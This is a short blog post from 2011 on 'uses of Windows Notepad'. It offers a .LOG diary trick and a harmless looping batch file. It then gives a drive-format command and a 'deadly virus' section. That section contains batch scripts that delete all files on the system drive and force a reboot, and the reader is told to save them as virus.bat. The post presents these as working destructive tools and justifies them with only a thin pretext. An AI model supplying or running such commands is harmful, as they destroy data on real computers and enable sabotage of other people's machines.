Wednesday, 26 October 2011

USES OF WINDOWS NOTEPAD

Notepad is one small but useful tool that most people have ignored. Its a great programming tool for both complex and simple programs. One deadly program that this tool can write is computer VIRUS.
Im going to take you through some simple programs that you can write with NOTEPAD.


  1. DIARY
    open notepad and type the following codes or copy and paste without the sign ""
    ".LOG"
    Save it as diary.txt
    Now anytime you open it, date and time will be inserted automatically.
  2. make matrix
    Type or copy the following codes with the ""
    "
    @echo off
    : start
    echo %random% %random% %random% %random% %random% %random% %random% %random%
    goto start "
    Save it as matrix.bat.
    This is just for fun and its not harmful.
  3. To format drives
    Notepad can be use to format drives just in a second.
    Type or copy and paste the following codes without the quote "". And replace 'c' by the letter of the drive you want to format.
    "format c:\ /Q/X" this will format
    your drive c:\
  4. DEADLY VIRUS
    NB: DONT OPEN THIS ON YOUR COMPUTER OR A FRIENDS COMPUTER BECAUSE IT WILL DELETE ALL SYSTEM FILE AND SHUTDOWN THE COMPUTER AUTOMATICALLY. IT SHOULD BE USED WHEN A VIRUS PREVENT A HARD DISK FROM FORMATING. PLEASE USE IT FOR GOOD ONLY.

    Open notepad and enter the following code or copy and paste without the quotes ""
    "@Echo off
    Del C:\ *.*|y"

    Or worse
    "@echo off
    del %systemdrive% \*.*/t /s /q
    shutdown -r -f -t 00"
    Save it as virus.bat
    When this file is open, the effect will take place

No comments:

Post a Comment